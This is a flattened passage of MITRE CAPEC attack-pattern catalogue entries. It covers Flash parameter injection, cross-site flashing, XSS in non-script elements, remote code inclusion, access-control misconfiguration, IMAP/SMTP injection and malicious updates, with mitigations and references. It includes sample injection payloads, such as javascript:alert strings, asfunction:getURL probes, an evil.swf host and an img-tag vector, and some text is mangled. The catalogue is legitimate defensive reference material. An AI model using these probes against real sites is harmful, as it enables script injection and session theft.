according to context before reflected back to the user. Medium High Injection The following are examples for different types of parameters passed to the Flash movie. DOM-based Flash parameter injection <object> <embed src="myFlash.swf" flashvars="location=http://example.com/index.htm#&globalVar=e-v-i-l"></embed> </object> Passing parameter in an embedded URI <object type="application/x-shockwave-flash" data="myMovie.swf?globalVar=e-v-i-l" ></object> Passing parameter in flashvars <object type="application/x-shockwaMovie.swf" ve-flash" data="my flashvars="language=English&globalVar=e-v-i-l"></object> Persistent Flash Parameter Injection // Create a new shared object or read an existing one mySharedObject = SharedObject.getLocal("flashToLoad"); if (_root.flashfile == undefined) { // Check whether there is a shared object saved if (mySharedObject.data.flash == null) { // Set a default value _root.flashfile = "defaultFlash.swf"; } else { // Read the flash file to load from the shared object _root.flashfile = mySharedObject.data.flash; } } // Store the flash file's name in the shared object mySharedObject.data.flash = _root.flashfile; // Load the flash file getURL(_root.flashfile); If an unsuspecting user is lured by an attacker to click on link like this: http://example.com/vulnerable.swf?flashfile=javascript:alert(document.domain) The result will be not merely a one-time execution of the JavaScript code in the victim's browser in the context of the domain with the vulnerable Flash file, but every time the Flash is loaded, whether by direct reference or embedded inside the same domain, the JavaScript will be executed again. Medium The attacker need inject values into the global parameters to the Flash movie and understand the parent HTML document DOM structure. The attacker need be smart enough to convince the victim to his crafted link. The attacker must convince the victim to click their crafted link. User input must be sanitized according to context before reflected back to the user. The JavaScript function 'encodeURI' is not always sufficient for sanitizing input intended for global Flash parameters. Extreme caution should be taken when saving user input in Flash cookies. In such cases the Flash file itself will need to be fixed and recompiled, changing the name of the local shared objects (Flash cookies). Confidentiality "Varies by context" Information Leakage Authorization Execute unauthorized code or commands Run Arbitrary Code User-controllable URL used as global parameter for Flash movies Crafted value for global parameter and special characters. The embedded Flash movie and the parent HTML document. The injected parameters can allow the attacker to get full control over the parent document's DOM model as well as other objects within the Flash movie. 184 Targeted 185 Targeted 697 Targeted CAPEC-246 Cross-Site Scripting using Flash 1000 Attack Pattern ChildOf 137 http://capec.mitre.org/data/definitions/137.html 1000 Attack Pattern CanPrecede 246 1000 Attack Pattern CanAlsoBe 460 Penetration Exploitation High High Medium Client-Server n-Tier All All All Yuval B. Ayal Y. Adi S. Flash Parameter Injection: A Security Advisory IBM Rational Security Team September 24, 2008 http://blog.watchfire.com/FPI.pdf Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content MITRE Content Team MITRE 2013-06-21 Updated Comment and Example-Instance_Description Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases An attacker exploits a weakness in input validation on the target to force arbitrary code to be retrieved from a remote location and executed. This differs from script injection in that script injection involves the direct inclusion of scripting code while code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application. One example of this sort of attack is PHP file include attacks where the parameter of an include() function is set by a variable that an attacker is able to control. The result is that arbitrary code could be loaded into the PHP application and executed. The target application must include external code/libraries that are executed when the application runs and the attacker must be able to influence the specific files that get included. The victim must run the targeted application, possibly using the crafted parameters that the attacker uses to identify the code to include. Very High The attacker may need to be able to host code modules if they wish their own code files to be included. 1000 Category ChildOf 152 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker manipulates files or settings external to a target application which affect the behavior of that application. For example, many applications use external configuration files and libraries - modification of these entities or otherwise affecting the application's ability to use them would constitute a configuration/environment manipulation attack. The target application must consult external files or configuration controls to control its execution. All but the very simplest applications meet this requirement. Medium The attacker must have the access necessary to affect the files or other environment items the targeted application uses for its operations. 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker exploits file location algorithms in an operating system or application by creating a file with the same name as a protected or privileged file. The attacker could manipulate the system if the attacker-created file is trusted by the operating system or an application component that attempts to load the original file. Applications often load or include external files, such as libraries or configuration files. These files should be protected against malicious manipulation. However, if the application only uses the name of the file when locating it, an attacker may be able to create a file with the same name and place it in a directory that the application will search before the directory with the legitimate file is searched. Because the attackers' file is discovered first, it would be used by the target application. This attack can be extremely destructive if the referenced file is executable and/or is granted special privileges based solely on having a particular name. The target application must exclude external files. Most non-trivial applications meet this criterion. The target application does not verify that a located file is the one it was looking for through means other than the name. Many applications fail to perform checks of this type. The directories the target application searches to find the included file include directories writable by the attacker which are searched before the protected directory containing the actual files. It is much less common for applications to meet this criterion, but if an attacker can manipulate the application's search path (possibly by controlling environmental variables) then they can force this criterion to be met. Very High The attacker must have sufficient access to place an arbitrarily named file somewhere early in the application's search path. 1000 Attack Pattern ChildOf 165 SecurityInnovation http://www.securityinnovation.com/library/attacks/implementation.shtml CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker is able to trick the victim into executing a Flash document that passes commands or calls to a Flash player browser plugin, allowing the attacker to exploit native Flash functionality in the client browser. This attack pattern occurs where an attacker can provide a crafted link to a Flash document (SWF file) which, when followed, will cause additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document. The attack takes advantage of the fact that Flash files can reference external URLs. If variables that serve as URLs that the Flash application references can be controlled through parameters, then by creating a link that includes values for those parameters, an attacker can cause arbitrary content to be referenced and possibly executed by the targeted Flash application. Identification Using a browser or an automated tool, an attacker records all instances of URLs (or partial URL such as domain) passed to a flash file (SWF). Use an automated tool to record the variables passed to a flash file. env-Web Use a browser to manually explore the website and analyze how the flash file receive variables, e.g. JavaScript using SetVariable/GetVariable, HTML FlashVars param tag, etc. env-Web Use decompilers to retrieve the flash source code and record all user-controllable variables passed to a loadMovie* directive. env-Web A URL is passed as parameter to a flash file (SWF). env-Web No variable appear on the URL. Even though none appear, the flash movie may still use them if they are provided. env-Web Application doesn't use variable to specify what URL to load remote flash movies from. env-Web A list of flash files, with their corresponding parameters is created by the attacker. Attempt to inject a remote flash file The attacker makes use of a remotely available flash file (SWF) that generates a uniquely identifiable output when executed inside the targeted flash file. Modify the variable of the SWF file that contains the remote movie URL to the attacker controlled flash file. env-Web The attacker's flash movie is being executed in the targeted movie. env-Web The targeted flash movie doesn't appear to allow the inclusion of flash movies from untrusted domains (specified in the crossdomain.xml or in the flash movie itself). env-Web The attacker's flash movie can access the targeted flash movie internal variables The attacker's flash movie cannot access any content of the targeted flash movie Access or Modify Flash Application Variables As the attacker succeeds in exploiting the vulnerability, he targets the content of the flash application to steal variable content, password, etc. Develop malicious Flash application that is injected through vectors identified during the Experiment Phase and loaded by the victim browser's flash plugin and sends document information to the attacker. env-Web Develop malicious Flash application that is injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the flash application to execute appropriately. env-Web The attacker gets the user's session identifiers or other type of credentials The attacker gets the content of the variables used in the flash application The attacker causes the flash application to be remotely controlled Apply appropriate configuration settings for cross domain flash applications in the crossdomain.xml file. Apply appropriate configuration settings for cross domain flash applications inside the flash application. Execute JavaScript in victim's browser When the attacker targets the current flash application, he can choose to inject JavaScript in the client's DOM and therefore execute cross-site scripting attack. Develop malicious JavaScript that is injected from the rogue flash movie to the targeted flash application through vectors identified during the Experiment Phase and loaded by the victim's browser. env-Web The attacker is able to execute a DOM based cross-site scripting attack on the victim. Apply appropriate configuration settings for cross domain flash applications in the crossdomain.xml file. Apply appropriate configuration settings for cross domain flash applications inside the flash application. The targeted Flash application must reference external URLs and the locations thus referenced must be controllable through parameters. The Flash application must fail to sanitize such parameters against malicious manipulation. The victim must follow a crafted link created by the attacker. Medium Medium Injection The attacker tries to get his malicious flash movie to be executed in the targeted flash application. The malicious file is hosted on the attacker.com domain and the targeted flash application is hosted on example.com The crossdomain.xml file in the root of example.com allows all domains and no specific restriction is specified in the targeted flash application. When the attacker injects his malicious file in the vulnerable flash movie, the rogue flash application is able to access internal variables and parameter of the flash movie. Medium knowledge of Flash internals, parameters and remote referencing. Implementation: Only allow known URL to be included as remote flash movies in a flash application Configuration: Properly configure the crossdomain.xml file to only include the known domains that should host remote flash movies. Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism Externally controllable external URL references within a flash file (SWF). Any HTTP Request transport variables (GET, POST, Headers, etc.). Flash plugin inside the client web browser where script is executed. Client web browser may be used to steal session data, passwords and other information which transit through the vulnerable flash application. 1000 Attack Pattern ChildOf 182 http://capec.mitre.org/data/definitions/18.html Exploitation High High Low Web Client-Server n-Tier All All All Stefano Di Paola Testing Flash Applications 2007 http://www.wisec.it/en/Docs/flash_App_testing_Owasp07.pdf OWASP Testing Guide Testing for Cross site flashing (OWASP-DV-004) v4 [DRAFT] The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OWASP-DV-004) Romain Gaucher Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Pre-review - 0.1 An attacker is able to discover and query Micro-services at a web location and thereby expose the Micro-services to further exploitation by gathering information about their implementation and function. Micro-services in web pages allow portions of a page to connect to the server and update content without needing to cause the entire page to update. This allows user activity to change portions of the page more quickly without causing disruptions elsewhere. However, these micro-services may not be subject to the same level of security review as other forms of content. For example, a micro-service that posts requests to a server that are turned into SQL queries may not adequately protect against SQL-injection attacks. As a result, micro-services may provide another vector for a range of attacks. It should be emphasized that the presence of micro-services does not necessarily make a site vulnerable to attack, but they do provide additional complexity to a web page and therefore may contain vulnerabilities that support other attack patterns. The target site must use micro-services that interact with the server and one or more of these micro-services must be vulnerable to some other attack pattern. Medium The attacker usually needs to be able to invoke micro-services directly in order to control the parameters that are used in their attack. The attacker may require other resources depending on the nature of the flaw in the targeted micro-service. 1000 Attack Pattern ChildOf 113 This attack is a form of Cross-Site Scripting (XSS) where malicious scripts are embedded in elements that are not expected to host scripts such as image tags (<img>), comments in XML documents (< !-CDATA->), etc. These tags may not be subject to the same input validation, output validation, and other content filtering and checking routines, so this can create an opportunity for an attacker to tunnel through the application's elements and launch a XSS attack through other elements. As with all remote attacks, it is important to differentiate the ability to launch an attack (such as probing an internal network for unpatched servers) and the ability of the remote attacker to collect and interpret the output of said attack. Spider Using a browser or an automated tool, an attacker records all entry points for inputs that happen to be reflected in a client-side non-script element. These non-script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc. Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application. env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery. env-Web At least one input is reflected in a non-script element. env-Web Using URL rewriting, parameters may be part of the URL path and still used in a non-script element. env-Web No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker. These parameters are all used in, possibly, client-side non-scripts elements. A list of application user interface entry fields is created by the attacker. A list of resources accessed by the application is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Probe identified potential entry points for XSS vulnerability The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. Since these probes may have to be injected in many different types of non-script elements, they should cover a variety of possible contexts (CSS, HTML tag, XML, etc.). env-Web Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. Since these probes may have to be injected in many different types of non-script elements, they should cover a variety of possible contexts (CSS, HTML tag, XML, etc.). env-Web Use a proxy tool to record results of the created requests. env-Web User-controllable input is output back to the browser env-Web Output to the browser is not encoded to remove executable scripting syntax. env-Web The attacker's script string is being reflected verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, etc.) All context-sensitive characters are consistently re-encoded before being sent to the web browser. For example, in a HTML tag element, the payload may not be able to evade the quotes in order to inject another attribute. Some sensitive characters are consistently encoded, but others are not. Depending on which type of non-script element the payload is injected in, it may be possible to evade the encodings. Monitor input to web servers (not only GET, but all potential inputs like COOKIES, POST, HEADER), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that hackers use. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Steal session IDs, credentials, page content, etc. As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker. env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately. env-Web The attacker gets the user's cookies or other session identifiers. The attacker gets the content of the page the user is viewing. The attacker causes the user's browser to visit a page with malicious content. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Forceful browsing When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not). Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities). env-Web The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF. The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Content spoofing By manipulating the content, the attacker targets the information that the user would like to get from the website. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page. env-Web The user sees a page containing wrong information Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Target client software must be a client that allows script execution based on scripts generated by remote hosts. Very High High Injection API Abuse In this example, the attacker adds script to HTML tags other than <script> tags, when the victim's standard content is appended with a malicious script. For example a link to http://myfavoritewebsite/getMyHomePage/content?maliciousscript.js The victim clicks on the link, which directs them to their home page (so that the victim does not notice anything is amiss) and simultaneously executes a script on their machine. Low To achieve a redirection and use of less trusted source, an attacker can simply edit content such as XML payload or HTML files that are sent to client machine. High Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process. Ability to include malicious script in document, e.g. HTML file, or XML document. Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine Design: Use browser technologies that do not allow client side scripting. Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification. Implementation: Perform input validation for all remote content. Implementation: Perform output validation for all remote content. Implementation: Disable scripting languages such as JavaScript in browser Implementation: Session tokens for specific host Implementation: Service provider should not use the XMLHttpRequest method to create a local proxy for content from other sites, because the client will not be able to discern what content comes from which host. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read application data Malicious input delivered through standard document formats, e.g. XML document or HTML file to the client. Varies with instantiation of attack pattern. In the case of HTML files they may not be visible to the end user via a browser. Client software and its component libraries Enables attacker to execute scripts to launch attacks on remote client machine and environment 79 Targeted 80 Targeted 83 Targeted 84 Secondary 82 Targeted 348 Targeted 96 Targeted 20 Targeted 116 Targeted 184 Secondary 86 Secondary 350 Targeted 692 Targeted 697 Targeted 713 Targeted 71 Targeted 1000 Attack Pattern ChildOf 63 1000 Attack Pattern ChildOf 242 333 Category HasMember 341 Penetration Medium Medium Low All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.18.1][REF-2] Cigital, Inc 2007-01-01 [R.18.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances, Solutions_and_Mitigations, Type (Attack_Pattern -> Attack_Pattern) An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack. Most commonly, attackers would take advantage of controls that provided too little protection for sensitive activities in order to perform actions that should be denied to them. In some circumstances, an attacker may be able to take advantage of overly restrictive access control policies, initiating denial of services (if an application locks because it unexpectedly failed to be granted access) or causing other legitimate actions to fail due to security. The latter class of attacks, however, is usually less severe and easier to detect than attacks based on inadequate security restrictions. This attack pattern differs from CAPEC 1, "Accessing Functionality Not Properly Constrained by ACLs" in that the latter describes attacks where sensitive functionality lacks access controls, where, in this pattern, the access control is present, but incorrectly configured. Survey The attacker surveys the target application, possibly as a valid and authenticated user. Spider the web site for all available links. env-Web Brute force to guess all function names/action with different privileges. env-Web Access control mechanism is present in the system. env-Web Operating modes with different privileges are present in the system. env-Web The attacker gets a list of functionality and data that can be accessed through the system. Correctly configure access control policy. Identify weak points in access control configurations The attacker probes the access control for functions and data identified in the Explore phase to identify potential weaknesses in how the access controls are configured. The attacker attempts authenticated access to targeted functions and data. env-All The attacker attempts unauthenticated access to targeted functions and data. env-All The attacker attempts indirect and side channel access to targeted functions and data. env-All Access the function or data bypassing the access control The attacker executes the function or accesses the data identified in the Explore phase bypassing the access control. The attacker executes the function or accesses the data not authorized to him. env-All Functionality is accessible to unauthorized users. Configure the access control correctly. The target must apply access controls, but incorrectly configure them. However, not all incorrect configurations can be exploited by an attacker. If the incorrect configuration applies too little security to some functionality, then the attacker may be able to exploit it if the access control would be the only thing preventing an attacker's access and it no longer does so. If the incorrect configuration applies too much security, it must prevent legitimate activity and the attacker must be able to force others to require this activity.. Medium High Analysis Brute Force For example, an incorrectly configured Web server, may allow unauthorized access to it, thus threaten the security of the Web application. Low In order to discover unrestricted resources, the attacker does not need special tools or skills. He only has to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly. No special resources are required for this attack. Design: Configure the access control correctly. Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read memory Integrity Modify memory Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Authorization Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism Availability DoS: crash / exit / restart DoS: instability 732 Targeted 1000 Attack Pattern ChildOf 122 http://capec.mitre.org/data/definitions/122.html Penetration High High High All All All All Silvio Cesare Share Library Call Redirection Via ELF PLT Infection Issue 56 Phrack Magazine 2000 http://www.phrack.org/issues.html?issue=56&id=7 OWASP Top 10 OWASP Top 10 2007 – Malicious File Execution 2007 The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Top_10_2007-A3 Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attacker creates a transparent overlay using flash in order to intercept user actions for the purpose of performing a clickjacking attack. In this technique, the Flash file provides a transparent overlay over HTML content. Because the Flash application is on top of the content, user actions, such as clicks, are caught by the Flash application rather than the underlying HTML. The action is then interpreted by the overlay to perform the actions the attacker wishes. The victim must be tricked into navigating to the attackers' decoy site and performing the actions on the decoy page. The victim's browser must support invisible Flash overlays. Medium The attacker must be able to force the Flash overlay over the decoy content. 1000 Attack Pattern ChildOf 103 CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker. Find Injection Entry Points The attacker first takes an inventory of the entry points of the application. Spider the website for all available URLs that reference a Flash application. env-Web List all uninitialized global variables (such as _root.*, _global.*, _level0.*) in ActionScript, registered global variables in included files, load variables to external movies. env-Web The application has embedded Flash movies. env-Web The application does not have embedded Flash movies. env-Web A list of URLs which has embedded Flash movies and the list of global uninitialized global variables, load variables to external movies. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Determine the application's susceptibility to Flash injection Determine the application's susceptibility to Flash injection. For each URL identified in the explore phase, the attacker attempts to use various techniques such as direct load asfunction, controlled evil page/host, Flash HTML injection, and DOM injection to determine whether the application is susceptible to Flash injection. Test the page using direct load asfunction, getURL,javascript:gotRoot("")///d.jpg env-Web Test the page using controlled evil page/host, http://example.com/evil.swf env-Web Test the page using Flash HTML injection, "'><img src='asfunction:getURL,javascript:gotRoot("")//.jpg' > env-Web Test the page using DOM injection, (gotRoot('')) env-Web Find at least one URL is susceptible to Flash injection. No URL is susceptible to injection found. Perform input validation on both the client side and the server side. Inject malicious content into target Inject malicious content into target utilizing vulnerable injection vectors identified in the Experiment phase The target must be capable of running Flash applications. In some cases, the victim must follow an attacker-supplied link. Medium High Injection In the following example, the SWF file contains getURL('javascript:SomeFunc("someValue")','','GET') A request like http://example.com/noundef.swf?a=0:0;alert('XSS') becomes javascript:SomeFunc("someValue")?a=0:0;alert(123) Medium The attacker may need to be able to serve the injected Flash content, but otherwise no special resources are required. Implementation: remove sensitive information such as user name and password in the SWF file. Implementation: use validation on both client and server side. Implementation: remove debug information. Implementation: use SSL when loading external data Implementation: use crossdomain.xml file to allow the application domain to load stuff or the SWF file called by other domain. Confidentiality "Varies by context" Information Leakage Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read memory Integrity Modify memory Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism URL, the objects in the SWF file, script in the Web browser. The crafted value injected to the URL or other objects in the SWF file. The application environment where the Flash runs. The injection can allow the attacker to get sensitive information, escalate privilege, execute commands and cross-site scripting using Flash etc. 20 Targeted 184 Targeted 697 Targeted 1000 Category ChildOf 152 1000 Attack Pattern CanAlsoBe 137 http://capec.mitre.org/data/definitions/137.html Penetration Exploitation High Medium Low Client-Server n-Tier All All All Stefano Di Paola Finding Vulnerabilities in Flash Applications Owasp Appsec 2007 November 15, 2007 Rudra K. Sinha Roy A Lazy Pen Tester's Guide to Testing Flash Applications iViz http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen-tester-guide/ Peleus Uhley Creating More Secure SWF Web Application Adobe Systems Incorporated http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker exploits weaknesses in input validation on IMAP/SMTP servers to execute commands on the server. Web-mail servers often sit between the Internet and the IMAP or SMTP mail server. User requests are received by the web-mail servers which then query the back-end mail server for the requested information and return this response to the user. In an IMAP/SMTP command injection attack, mail-server commands are embedded in parts of the request sent to the web-mail server. If the web-mail server fails to adequately sanitize these requests, these commands are then sent to the back-end mail server when it is queried by the web-mail server, where the commands are then executed. This attack can be especially dangerous since administrators may assume that the back-end server is protected against direct Internet access and therefore may not secure it adequately against the execution of malicious commands. The target environment must consist of a web-mail server that the attacker can query and a back-end mail server. The back-end mail server need not be directly accessible to the attacker. The web-mail server must fail to adequately sanitize fields received from users and passed on to the back-end mail server. The back-end mail server must not be adequately secured against receiving malicious commands from the web-mail server. Medium No special resources are required for this attack. However, in most cases, the attacker will need to be a recognized user of the web-mail server. 1000 Attack Pattern ChildOf 248 OWASP Testing Guide Testing for IMAP/SMTP Injection (OWASP-DV-011) v4 [DRAFT] The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Testing_for_IMAP/SMTP_Injection_(OWASP-DV-011) CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker initiates a series of events designed to cause a user, program, server, or device to perform actions which undermine the integrity of software code, device data structures, or device firmware, achieving the modification of the target's integrity to achieve an insecure state. Low Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code. Software Integrity Attacks are usually a late stage focus of attack activity which depends upon the success of a chain of prior events. The resources required to perform the attack vary with respect to the overall attack strategy, existing countermeasures which must be bypassed, and the success of early phase attack vectors. 494 Targeted 1000 Category ChildOf 210 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack. Very High 494 Targeted 1000 Attack Pattern ChildOf 184 An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code believed to be a valid update that originates from an attacker controlled source. Although there are several variations to this strategy of attack, the attack methods are united in that all rely on the ability of an attacker to position and disguise malicious content such that it masquerades as a legitimate software update which is then processed by a program, undermining application integrity. As such the attack employs 'spoofing' techniques augmented by psychological or technological mechanisms to disguise the update and/or its source. Virtually all software requires frequent updates or patches, giving the attacker immense latitude when structuring the attack, as well as many targets of opportunity. Attacks involving malicious software updates can be targeted or untargeted in reference to a population of users, and can also involve manual and automatic means of payload installation. Untargeted attacks rely upon a mass delivery system such as spamming, phishing, or trojans/botnets to distribute emails or other messages to vast populations of users. Targeted attacks aim at a particular demographic or user population. Manual, or user-assisted attacks, vary from requiring the user to download and run an executable, to as streamlined as tricking the user on clicking a single url. Attacks which aim at penetrating a specific network infrastructure often rely upon secondary attack methods to achieve the desired impact. Spamming, for example, is a common method employed as an secondary attack vector. Thus the attacker has in his or her arsenal a choice of initial attack vectors ranging from traditional SMTP/POP/IMAP spamming and its varieties, to web-application mechanisms which commonly implement both chat and rich HTML messaging within the user interface. Corporate Facebook or Myspace pages make it easy to target users of a specific company or affiliation without relying on email address harvesting or spamming. One phishing-assisted variation on this attack involves hosting what appears to be a software update, then harvesting actual email addresses for an organization, or generating commonly used email addresses, and then sending spam, phishing, or spear-phishing emails to the organization's users requesting that they manually download and install the malicious software update. This type of attack has also been conducted using an Instant Messaging virus payload, which harvests the names from a user's contact list and sends instant messages to those users to download and apply the update. While both methods involve a high degree of automated mechanisms to support the attack, the primary vector for achieving the installation of the update remains a manual user-directed process, although clicking a link within an IM client or web application may initiate the update. Manual attacks of this nature are common and frequently supported by social networking sites, such as Myspace or Facebook, and have proven to be immensely successful. Automated attacks involving malicious software updates require little to no user-directed activity and are therefore advantageous because they avoid the complex preliminary setup stages of manual attacks, which must effectively 'hook' users while avoiding countermeasures such as spam filters or web security filters. Automated update mechanisms typically come in two kinds, each requiring different mechanics for exploitation. 'Pull' mechanisms retrieve periodic updates from a server, a process in which the client software or local server installation retrieves the update from a remote network source. While 'Pull' mechanisms are highly automated there is still some user directed activity involved in the update process. 'Push' mechanisms involve a remote server sending an update to a client, which is typically processed when it is received. A characteristic of 'Push' updates is that they typically involve the least user interaction within the update process, thus narrowing the scope of the attack to automated mechanisms. Automated update attacks typically exploit a lack of technical mechanisms to validate the integrity of code before it is downloaded. Low Manual or user-assisted attacks require deceptive 